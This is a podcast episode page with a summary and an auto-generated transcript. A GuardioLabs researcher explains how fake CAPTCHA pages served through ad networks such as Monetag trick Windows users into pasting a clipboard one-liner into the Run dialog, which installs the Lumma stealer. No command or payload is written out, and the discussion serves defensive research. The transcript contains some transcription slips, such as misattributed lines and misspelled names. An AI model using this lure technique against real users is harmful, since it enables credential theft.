Bot or not? The fake CAPTCHA trick spreading Lumma malware. [Research Saturday} - CyberWire Daily

Summary4 min read

CyberWire Daily: Episode Summary Title: Bot or not? The fake CAPTCHA trick spreading Lumma malware. [Research Saturday} Release Date: February 15, 2025 Host: Dave Bittner Guest: Nati Tal, Head of GuardioLabs

Introduction to the Threat

In this episode of CyberWire Daily, host Dave Bittner engages in an in-depth discussion with Nati Tal from GuardioLabs about a sophisticated cyber threat involving fake CAPTCHA pages used to disseminate Lumma malware. This research illuminates the evolving tactics of cyber adversaries and the intricate role of ad networks in facilitating such attacks.

Understanding the Fake CAPTCHA Campaign

Nati Tal explains the emergence and escalation of fake CAPTCHA phishing pages. Originally designed as educational tools within the cybersecurity community, these CAPTCHA replicas were repurposed by scammers to deceive users.

Nati Tal [02:22]: "The fake captcha is something that we were familiar with like a year ago... eventually they saw it as a good opportunity to educate and scammers just took it and said, oh, that's great, let's just fork this repo, change the title, and that's it."

These malicious CAPTCHA pages mimic legitimate verification prompts, tricking users into executing hidden payloads unknowingly. By clicking seemingly innocuous buttons, users inadvertently trigger code that installs malware on their systems.

Mechanics of the Attack

The campaign leverages user familiarity with CAPTCHA prompts to initiate malware installation seamlessly. Nati Tal details how unsuspecting users are manipulated into executing malicious commands:

Nati Tal [04:38]: "Instead of just clicking on a button or selecting those traffic lights, you are asked to click on some buttons on your computer... clicking on Control R... executes a payload... running commands... all done in the background and you get yourself hit with a stealer."

This method ensures minimal user suspicion while effectively deploying malware that can steal personal information swiftly.

The Central Role of Ad Networks

A pivotal focus of the research is the exploitation of ad networks to propagate the malicious CAPTCHA pages at scale. Nati Tal highlights how a single ad network, Monetag, became the backbone of this widespread attack.

Nati Tal [07:37]: "All of the flow, all of the victims of these specific campaigns come eventually from one single ad network."

Monetag orchestrates the distribution by integrating malicious scripts into publisher websites, which then serve deceptive ads to visitors. This seamless integration facilitates the widespread dissemination of fake CAPTCHA pages without immediate detection.

Propagation and Obfuscation Techniques

The research delves into the sophisticated methods used to obscure the malicious activities, making it difficult for security analysts to trace and mitigate the threat. Nati Tal explains the use of multiple intermediary services and cloakers:

Nati Tal [13:46]: "They were using some other services that are again from the ad industry... increasingly using different domains and techniques to obfuscate the malicious content."

By continuously changing domains and employing cloaking techniques, the attackers ensure that the malicious content remains elusive to traditional ad blockers and security measures.

Challenges in Mitigation

Addressing the fragmented accountability within ad networks presents significant hurdles. Nati Tal discusses the difficulties in holding any single entity accountable due to the layered infrastructure supporting the attacks.

Nati Tal [20:19]: "This is the fragmented accountability of the ad network system... it makes it perfect for scammers, because again, ad networks, they are legit, everything is okay."

Even when specific ad networks like Monetag and Bmob respond by taking down malicious accounts, the attackers quickly re-establish their campaigns through new accounts and alternative networks, perpetuating the cycle of infection.

Impact and Persistence of the Threat

The persistent nature of the threat underscores the lucrative incentives behind such cybercrimes. Despite efforts to dismantle the malicious infrastructure, the ease with which attackers can regenerate and reroute their campaigns ensures ongoing vulnerability for users.

Nati Tal [25:16]: "There's a lot of money in advertisements... ad blocking is important, but it's not only on ads... it's hard to actually report and take down those kinds of threats."

Innovative Defense Strategies

GuardioLabs advocates for advanced blocking techniques that transcend traditional methods. Nati Tal emphasizes the importance of monitoring user behavior and flow to detect anomalies indicative of such attacks, rather than relying solely on blocking specific domains or content.

Nati Tal [30:08]: "We can block these kinds of anomalies even without knowing what is the malicious content at the end."

By focusing on the overall flow and contextual behavior, GuardioLabs aims to preemptively identify and halt malicious activities before they can inflict harm.

Conclusion and Future Outlook

The episode concludes with reflections on the resilience and adaptability of cyber threats facilitated by ad networks. Nati Tal underscores the necessity for continuous innovation in security measures to stay ahead of evolving tactics.

Dave Bittner [31:30]: "Our thanks to Nati Tal from GuardioLabs for joining us... keeping you a step ahead in the rapidly changing world of cybersecurity."

This conversation highlights the critical interplay between cybercriminal strategies and the defensive mechanisms required to counteract them, emphasizing the ongoing battle to secure the digital landscape.

Key Takeaways

Sophisticated Phishing: Fake CAPTCHA pages are a deceptive tool for distributing malware like Lumma, exploiting user familiarity to bypass security.
Ad Network Exploitation: Malicious actors leverage ad networks such as Monetag to distribute attacks at scale, utilizing obfuscation and cloaking techniques to evade detection.
Fragmented Accountability: The layered and interconnected nature of ad networks complicates the process of holding any single entity responsible, perpetuating the spread of malware.
Advanced Defense Mechanisms: Moving beyond traditional blocking, innovative strategies focusing on user behavior and flow analysis are essential for effective threat detection and mitigation.

For a comprehensive understanding and detailed insights, listeners are encouraged to refer to the full episode of CyberWire Daily and explore the research conducted by GuardioLabs.

Loading summary

Transcript24 lines

[00:02]
Dave Bittner
You're listening to the Cyberwire network, powered by N2K. Hey, everybody, Dave here. Have you ever wondered where your personal information is lurking online? Like many of you, I was concerned about my data being sold by data brokers, so I decided to try Deleteme. I have to say, Deleteme is a game changer. Within days of signing up, they started removing my personal information from hundreds of data brokers. I finally have peace of mind knowing my data privacy is protected. Deleteme's team does all the work for you with detailed reports so you know exactly what's been done. Take control of your data and keep your private life private by signing up for Deleteme now at a special discount for our listeners today. Get 20% off your delete me plan when you go to JoinDeleteMe.com N2K and use promo code N2K at checkout. The only way to get 20% off is to go to JoinDeleteMe.comN2K and enter code N2K at checkout. That's JoinDeleteMe.com N2k code N2K. Hello everyone and welcome to the Cyberwires Research Saturday. I'm Dave Buettner and this is our weekly conversation with researchers and analysts tracking down the threats and vulnerabilities, solving some of the hard problems, and protecting ourselves in a rapidly evolving cyberspace. Thanks for joining us.
[01:54]
Nati Tal
How did they manage to go to such a large scale in such a short time?
[02:02]
Dave Bittner
That's Nati Tal, head of Guardiolabs. The research we're discussing today is titled Deception, Fake Captcha Driving Infosteeler Infections and A Glimpse to the Dark side of Internet Advertising.
[02:23]
Nati Tal
Because something else is going on and we want to understand what and be able to maybe in the future stop those kinds of things from in the beginning before they continue to propagate in such scale. So basically the fake captcha is something that we were familiar with like a year ago, something like that. It's actually a funny story because the fake captcha like we see today, used by threat actors and all those bad guys and scammers all around, started off as an educational repo at GitHub for testing and for raising awareness by some of the community, cybersecurity community members, some that we know, but I won't say names now, and eventually they saw it as a good opportunity to educate and scammers just took it and said, oh, that's great, let's just fog this repo, change the title, and that's it. And the real Deal behind it is again the payload itself, which is Lumasteela and some other variants of that. But the interesting part of it, and this is what we also focused on in our research, is more of the propagation, how you actually get those fake captchas to pop up on users computers on their screens at the first place and in such scale. And this is what was interesting for us because again, taking this kind of phishing page out of a repo and duplicate it, nothing innovative here, but the real deal is to actually weaponizing this kind of simple phishing page and in such scale.
[04:24]
Dave Bittner
Well, before we dig into some of the details of the work that you all did here for folks who might not be familiar with it, can you give us a little explanation of how exactly this fake captcha stealer campaign works?
[04:38]
Nati Tal
Well, the phishing page itself, and this is why we also call it fake captcha, is basically a captcha page like we are already kind of used to seeing when we go to specific websites just to make sure we are not bots or something like that. And it's kind of our day to day when we enter those kinds of websites and are asked to make sure we are human. So sometimes you need to, I don't know, find the, the traffic lights on those pictures or some other kind of stuff or just click on a button and set it on and okay, you're okay, you're not a bot or a computer. And because we are so used to it, this is the exact point when scammers are entering and using. When you have your kinds of regular stuff you're doing all the time searching on Google and clicking on the first result you get, or entering a website and ask to make sure you're human. This is where scammers are eager to enter and use those kinds of activities. Because you are used to it, it's okay if you get a captcha. Let's go on with it. Let's just say that I want to see the website and this is exactly what they did, only that instead of just clicking on a button or selecting those traffic lights, you are asked to click on some buttons on your computer. Again, it's a bit strange, it's not like you are used to, but for the regular user it sounds legit. Click on some buttons and then it's all okay. But those buttons are not just any buttons specifically targeting Windows systems. If you click on Control R, you get the Run command and if you click on Control V you paste a payload they already placed in your clipboard that is actually a one liner code execution which help with PowerShell or any other kinds of variants we found lately, without even being aware, you are executing code on your computer. And what this code does, eventually after downloading a file and running some more commands, but it's all done in the background and you get yourself hit with a steal and all your personal information accounts and everything all is like in a matter of seconds at the hands of the scammers.
[07:24]
Dave Bittner
So you and your colleagues wanted to get to the bottom of this. And I hate to be a spoiler, perhaps a spoiler alert here, but it all comes down to ad networks, doesn't it?
[07:37]
Nati Tal
Yeah, eventually. And again, nothing new here, of course, because we already talked about in the last few years in other researchers by Guardian, and not only us of course, about abusers of any kind of ad network, like Facebook itself even, and Google search results that show up like fake pages of Slack and Notion and other and obs even. And all of this is not new. But when we started analyzing specifically this campaign, it was quite obscure to see that all of the flow, all of the victims of these specific campaigns come eventually from one single ad network. And you're not used to seeing stuff like that. Basically, threat actors try to propagate from different aspects by emails, SMSs, search results, just SEO poisoning even. But in this case it was orchestrated entirely by one ad network that we didn't know before. And when we dug in and tried to analyze the origin of this flow, it's like you're often in a Pandora box. Of course you realize that again, it's one ad network. And if you analyze the entire ad network, you see that around. I don't know specifically, but more than half of the ads that it will eventually pop on your computer are malicious in some way or not entirely legit. And not only that, the publisher websites, meaning the sites that monetize on their traffic with this ad network, they also share too much of their characteristics together, meaning it sounds and feels like everything is orchestrated from the beginning to the end. Again, it's just me saying that I don't have the exact gun, but we are working on it. But again, you see so many publisher websites that are more of the same, mostly privated content and video streaming and movies and anime and. And of course adult content. And all those websites are practically the same, they look and feel the same. We even found some repos in GitHub of those websites. Just fork it, change the specific tag for your convenience of your specific ad network you're using and upload it and that's it. You have a site, you can monetize all your traffic. And all the ad networks there were practically from the same actor. In this case, the actor, not the threat actor, is a company, an ad network that is eventually legit. Propeller ads that are very powerful and they walk all around the world and everything is legit and okay, but we see like sub companies or small companies or different brands that are behind the infrastructure. And also the name of propeller ads that are eventually used in many cases, I can't say most, I can't say it's intentional, but they are used for propagation of malicious content at the end of it.
[11:30]
Dave Bittner
Yeah. Well, let's walk through it together step by step here. I mean, can you take us through how is this ad network being used? How do things end up in their network and then ultimately on our systems? Can you take us through that journey?
[11:47]
Nati Tal
Well, let's make it from the point of view of a publisher. In the ad networks lingo, a publisher is a website that wants to monetize on their traffic. So for an example, I am a website that want to stream movies. Those movies are probably pirated and not, you know, I'm not Netflix, but I want to monetize on traffic. So I have, I have a host, I have a domain and I created some kind of website or even if I look around, I found some templates already made for movies and streaming. So I upload this website and now I want to monetize on my traffic. So I go to any kind of ad network, I register a user there and I add my website, my domain to their system, set it up on my main page or any other page of my website and basically that's it from that moment on this specific ad network. In our case in this research, it was an ad network named Monetag. So from this moment on, every visitor that visits my websites, they get my content, but also have a script managed and created by Monetag running on their browser. So what this script actually does is creating an ad zone, meaning a specific zone for advertising on my website. I choose if I want it to be a pop up or a pop under. In their lingo. It used to be pop under behind your website. It's not working anymore.
[13:44]
Dave Bittner
Yeah, everybody hated those.
[13:46]
Nati Tal
Yeah, yeah, we did. Saw some people trying to bring it back on and try other techniques to create those profunders. Some made it, but again this time Chrome is fast in fixing those kinds of bugs or exploitations. Now we have pop ups. Again, it's not legit as well, and you have pop ups and you have push notifications and you have fake push notifications that jump on top of your website. But anyways, from that moment on, Monetag is controlling my website and presenting ads as I requested. And in this case, the most hateful, I guess, type of advertising is those pop ups that everywhere you click on the page a new tab is popping up with a different content from what you were looking for. And what, what happens in this specific moment is a new tab is opened. It goes to Monetag's infrastructure or traffic distribution system, TDS like we call it, which is a list in this case of thousands of domains used specifically to trigger those kinds of advertisements. What they do is trying to fingerprint who I am, the visitor, what kind of computer I have, what kind of social networks I use. They even try to load some resources from Facebook and Twitter X and stuff like that just to fingerprint who I am and what would be the most, the perfect advertisement to show me in their case. And from that moment when they have their decision, they're moving me on to their advertising and the same, this monetized ad network as publishers, the one that created those websites and monetizing all the traffic and advertisers that show their creatives and any kind of other advertisement and ask those advertisements to be showed for visitors. And from that moment on, an advertisement is selected and we move on with redirects and other tricks to showing this specific advertisement in the fake captcha, specifically in the fake captcha campaign. It was more complex, which is also something that we realized that is not there for, I don't know, for statistics or for other kinds of technicalities, but specifically to try to obfuscate or to even make it harder for analysts like us to realize something bad is happening or. Well, this is exactly happening. So what they did is instead of using the endpoint, the fake capture page URL, they were using some other, we call them cloakers, other services that are again from the ad industry ad statistics, in this case bmob and made the link for the advertisement to be a bmob created link flowchain, eventually the real URL of the fake captcha. So From Monetag to Bobob and again the same occasion also there analyzing who is the visitor and et cetera, et cetera, and then eventually redirecting you to the fake captcha page.
[17:54]
Dave Bittner
We'll be right back.
[17:56]
Nati Tal
Foreign.
[18:00]
Dave Bittner
Cyber threats are evolving every second. And staying ahead is more than just a challenge. It's a necessity. That's why we're thrilled to partner with Threat Locker, the cybersecurity solution trusted by businesses worldwide. Threat Locker is a full suite of solutions designed to give you total control, stopping unauthorized applications, securing sensitive data, and enhance ensuring your organization runs smoothly and securely. Visit threatlocker.com today to see how a default deny approach can keep your company safe and compliant. Do you know the status of your compliance controls right now? Like right now, we know that real time visibility is critical for security, but when it comes to our GRC programs, we rely on point in time checks. More than 8,000 companies like Atlassian and Quora have continuous visibility into their controls with Vanta. Here's the Vanta brings automation to evidence collection across 30 frameworks like SoC2 and ISO 27001. They also centralize key workflows like policies, access reviews and reporting, and helps you get security questionnaires done five times faster with AI. Now that's a new way to GRC. Get $1,000 off Vanta when you go to vanta.com cyber that's vanta.com cyber for $1,000 off. So one of the things you point out in the research is this is set up in a way that it makes it harder to point the finger at any one particular organization. Right. I think in your research there are like four different organizations who along the way of delivering this ad, all have a hand in what's going on here. But they can all kind of point to each other and say, no, it's not us, it's them. They're the responsible party.
[20:20]
Nati Tal
Exactly. We call it the fragmented accountability of the ad network system. And this is exactly what makes it perfect for scammers, because again, ad networks, they are legit, everything is okay. The entire ecosystem of the Internet basically is based on advertisement. You know, if it's free, you are the product. Yeah. So what they are using in this case is a long, long chain like we just talked about, you know, from the publisher website to Monetag to their TDS to BMOP to another cloaker, et cetera, and eventually to the host that hosts this landing page, or in this case the fake Captcha, which is also a legit host. In this case, even Oracle Cloud was used and Cloudflare itself in some cases. So this long chain of accountability is what makes it harder for us security researchers and basically the entire security community to be able to block those kinds of campaigns. We tried it. One of the first things we did at Gaudio was to collect all the data, understand exactly what is happening who are the actors in this chain and contact them. So we contacted. It's a good example to see how, how hard it is to actually get those kinds of campaigns down for good. We contacted Monetag after a few days, they answered back. We gave them all the URLs we see and all the data we have. And indeed they took it down. They said that they had around 200 different accounts used specifically for this campaign of advertisers. So this was one part of it. Then we get to bimob that were used or abused in this case as well. They also talked to us quite quickly a few days, like two days later and took down all their accounts as well. And we did see the campaign going down for almost a week, which is great, of course, but. And here comes the important part of it. So we took it down. First of all, it took us around a week of emailing and you know, and it's not that simple to say to a company that, okay, you have a customer that is abusing your system. I know this customer is paying you, you have your obligation for that customer, but you need to take him down. It's hard to say that for a company. And you need to be very. To give all the information, the real information. It's not always that simple to get this kind of information. And this is why it took us a few days just to interact with Monetag in this case. But in those few days, millions of people got those captcha pages and probably hundred, thousands of them at least actually have those stealers installed on their system and got infected. So even though this is like the first part of it, the part that makes it harder to act quickly, and on the other hand, it was down for a week or something like that, it got back quite quickly on the same ad network again after a few days. And again we approached them and they took him down there, down again, a few more accounts, et cetera. But on a parallel path, the threat actors realized, okay, we now understand they got us on monitor, no worries, we have like a hundred other ad networks to use and they do have those hundred other ad networks like Monetag. And we quickly saw the same campaign, same pages, even same hosts, that we also approach them to take down those kind of pages again, new accounts, new ad networks, and the campaign is right back. Like it took them four days to get back to the same scale it was before.
[25:07]
Dave Bittner
Right? Well, I mean, without calling anyone out specifically here, I suppose there's a lot of money to be made by turning a blind eye. To this sort of thing.
[25:16]
Nati Tal
Exactly. And this is also something that we suspect, of course. And again, I don't have the smoking gun just yet, but this is a big industry and a lot of money, lots and lots of money in advertisements. And again, not only in advertisement, but also those threat actors. There is a reason why they are doing that as well. And because they are persistent and the ad networks are persistent and they want to continue their business as usual, it's hard to actually report and take down those kinds of threats. And this is also why, okay, we approach them just to see that everything is okay. And it's our first approach to monitoring. In this case, we wanted to see who are the people behind this company and that everything is legit and okay. But again, if not Monetag, there are like hundreds of other names, I can tell you, even some new very funny names. I have to mention them, the guys from Infoblox that we also cooperated with them on this research and they are also working on those kinds of TDSS for years now and, and they just realized a new ad network. Even two ad networks were created out of the blue and one is called it's all for all the Breaking bad enthusiastics los pollos1ad network and taco loco with co as the TLD of the domain. And great graphics, really great graphics and amazing websites for those ad networks. But again, you look at those ad networks and you understand that it's just another fork of Monetag stuff and other networks that are part of bigger networks just to be able to spread around different kinds of networks, different kinds of obligations, accountabilities just to keep the, keep the business rolling and not stopping.
[27:45]
Dave Bittner
I mean it reminds me, I think we've all been in that situation where you're using an ad blocker and you'll go to visit a site and it pops up and says, so we see you're using an ad blocker. Please disable your ad blocker. But this sort of research I think is a good reminder that ad blockers are security. Right, because so many ads out there are malicious.
[28:08]
Nati Tal
Yes and no. And I'll try to answer that. Well, again, also for us, by the way, any user of the Internet, if you block all advertisements for all the Internet users all around the world, there won't be any Internet. So we need to remember that as well. But saying that as you can see, many ad networks are being abused, even Google and Facebook are abused for malicious content in scale. And some, I guess again, no smoking gun yet are there specifically for those reasons because the big money is there. But again, ad blocking is important, but it's not only on ads. So you will get this kind of malicious content from any kind of other path, email, sms, posts on Facebook, on social and whatever. Also specifically for Monetag, they have created some quite a sophisticated obfuscation for their code that makes it harder, much harder on ad blockers to be able to block it. And not only that, we mentioned also another phrase, TDS traffic distribution system. Again, it's a list of thousands and thousands of domains. Those are the domains that those ad blockers need to block. Any kind of request for those domains, but those domains are changed and regenerated on a daily basis. So if you have an ad blocker it will work on some of the sites a day later. Most of the sites, it won't work on them. They're already using different domains. They know what they're doing in this case.
[30:09]
Dave Bittner
Right, Right.
[30:11]
Nati Tal
So you need to have also blocking Those kinds of TDSs also block the actual malicious content. And most importantly, and this is what is our holy grail here at Guardio, not only block a content specific because they can change it and make many variants like a few minutes later and you won't block it. Don't fingerprint malicious content, it won't work. And also don't fingerprint domains because domains change all the time. What we do is mostly look at the flow, where you get this information from, where you get this pop up from what you did before, what you're doing after. And because we know how threat actors work and where they want to hit their victims and pinpoint the specific area where it's the most. It's the best place to place this kind of fake captcha, for example, we look at the flow and then we can block these kinds of anomalies even without knowing what is the malicious content at the end.
[31:30]
Dave Bittner
Our thanks to Nati Tal from Guardiolabs for joining us. The research is titled Deception, Fake Captcha Driving Infosteeler Infections and A Glimpse to the Dark side of Internet Advertising. We'll have a link in the show notes that is Research Saturday brought to you by N2K Cyberwire. We'd love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like our show, please share a rating and review in your favorite podcast app. Please also fill out the survey in the Show Notes or send an email. Email to cyberwire2k.com this episode was produced by Liz Stokes. We're mixed by Elliot Peltzman and Trey Hester. Our Executive producer is Jennifer Ibin. Peter Kilpe is our publisher and I'm Dave Bittner. Thanks for listening. We'll see you back here next time.
[32:39]
Liz Stokes
Hey everyone, grab your favorite mug and put the kettle back on the stove because afternoon cyber tea is coming back this season, I am joined by an all star team of thought leaders and industry experts to dive into the critical trends that are shaping the future of cybersecurity. We will explore how these technologies are revolutionizing the way we work, the way we live and the way we interact with the world around us. And as always, we will be bringing you thought provoking discussions and fresh perspectives on what is driving the future of cybersecurity and what leaders can do now to protect their teams. Tomorrow, new episodes will be coming to you in February every other Tuesday. So subscribe now wherever you get your favorite podcasts.